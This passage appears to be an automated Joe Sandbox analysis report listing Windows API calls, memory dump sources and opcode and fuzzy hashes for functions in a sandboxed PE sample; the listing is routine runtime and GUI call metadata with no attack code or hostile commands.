          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
          • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
          • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
          • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
          APIs
          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
          • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
          • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
          • SendMessageW.USER32 ref: 00471AE3
          • DestroyIcon.USER32(?), ref: 00471AF4
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
          • String ID:
          • API String ID: 3611059338-0
          • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
          • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
          • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
          • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: DestroyWindow$DeleteObject$IconMove
          • String ID:
          • API String ID: 1640429340-0
          • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
          • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
          • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
          • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
          APIs
            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
          • _wcslen.LIBCMT ref: 004438CD
          • _wcslen.LIBCMT ref: 004438E6
          • _wcstok.LIBCMT ref: 004438F8
          • _wcslen.LIBCMT ref: 0044390C
          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
          • _wcstok.LIBCMT ref: 00443931
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
          • String ID:
          • API String ID: 3632110297-0
          • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
          • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
          • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
          • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Destroy$DeleteMenuObject$IconWindow
          • String ID:
          • API String ID: 752480666-0
          • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
          • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
          • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
          • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
          APIs
          • GetCurrentProcess.KERNEL32(0000000A,?), ref: 00436EC9
          • OpenProcessToken.ADVAPI32(00000000), ref: 00436ED0
          • CreateEnvironmentBlock.USERENV(?,?,00000001), ref: 00436EE0
          • CloseHandle.KERNEL32(?), ref: 00436EED
          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 00436F23
          • DestroyEnvironmentBlock.USERENV(?), ref: 00436F36
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
          • String ID:
          • API String ID: 1413079979-0
          • Opcode ID: c9cc6947404163de0e4cba86d071e92e41844a234d0bab68a120be017310f46c
          • Instruction ID: dd31e3d5ef53dadf09d6f4902918c4fef8fb0ebcc20249036383472598af8dfc
          • Opcode Fuzzy Hash: c9cc6947404163de0e4cba86d071e92e41844a234d0bab68a120be017310f46c
          • Instruction Fuzzy Hash: 10214C7620020AABDB14CF69DD59EEB37ADEB8D310F15851AFD05A3250C775EC12CB64
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Destroy$DeleteObjectWindow$IconImageList_
          • String ID:
          • API String ID: 3275902921-0
          • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
          • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
          • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
          • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Destroy$DeleteObjectWindow$IconImageList_
          • String ID:
          • API String ID: 3275902921-0
          • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
          • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
          • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
          • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
          APIs
          • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
          • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: PerformanceQuery$CounterSleep$Frequency
          • String ID:
          • API String ID: 2833360925-0
          • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
          • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
          • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
          • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: DeleteDestroyMessageObjectSend$IconWindow
          • String ID:
          • API String ID: 3691411573-0
          • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
          • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
          • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
          • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
          APIs
            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
          • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
          • LineTo.GDI32(?,?,?), ref: 004472AC
          • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
          • LineTo.GDI32(?,?,?), ref: 004472C6
          • EndPath.GDI32(?), ref: 004472D6
          • StrokePath.GDI32(?), ref: 004472E4
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
          • String ID:
          • API String ID: 372113273-0
          • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
          • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
          • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
          • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
          APIs
          • GetDC.USER32(00000000), ref: 0044CC6D
          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
          • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
          • MulDiv.KERNEL32 ref: 0044CCA8
          • MulDiv.KERNEL32 ref: 0044CCB9
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CapsDevice$Release
          • String ID:
          • API String ID: 1035833867-0
          • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
          • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
          • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
          • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
          APIs
          • __getptd.LIBCMT ref: 0041708E
            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
          • __amsg_exit.LIBCMT ref: 004170AE
          • __lock.LIBCMT ref: 004170BE
          • InterlockedDecrement.KERNEL32(?), ref: 004170DB
          • _free.LIBCMT ref: 004170EE
          • InterlockedIncrement.KERNEL32(02611A00), ref: 00417106
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
          • String ID:
          • API String ID: 3470314060-0
          • Opcode ID: 617261c075fb72b5a886f4b8183d121e1b7b203084663bc5d64a0c14d6246e65
          • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
          • Opcode Fuzzy Hash: 617261c075fb72b5a886f4b8183d121e1b7b203084663bc5d64a0c14d6246e65
          • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
          APIs
          • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
          • EnterCriticalSection.KERNEL32(?), ref: 0044B666
          • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
          • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
            • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000), ref: 00432622
          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
          • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
          • String ID:
          • API String ID: 3495660284-0
          • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
          • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
          • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
          • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
          APIs
          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Virtual
          • String ID:
          • API String ID: 4278518827-0
          • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
          • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
          • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
          • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
          APIs
          • ___set_flsgetvalue.LIBCMT ref: 004151C0
            • Part of subcall function 004178AE: TlsGetValue.KERNEL32 ref: 004178B7
            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
          • ___fls_getvalue@4.LIBCMT ref: 004151CB
            • Part of subcall function 0041788E: TlsGetValue.KERNEL32 ref: 0041789C
          • ___fls_setvalue@8.LIBCMT ref: 004151DD
          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
          • ExitThread.KERNEL32 ref: 004151ED
          • __freefls@4.LIBCMT ref: 00415209
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
          • String ID:
          • API String ID: 442100245-0
          • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
          • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
          • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
          • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
          APIs
            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
          • GetMenuItemInfoW.USER32 ref: 0045F85C
          • _wcslen.LIBCMT ref: 0045F94A
          • SetMenuItemInfoW.USER32 ref: 0045F9AE
            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
          • SetMenuDefaultItem.USER32(00000000,000000FF,00000000), ref: 0045F9CA
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
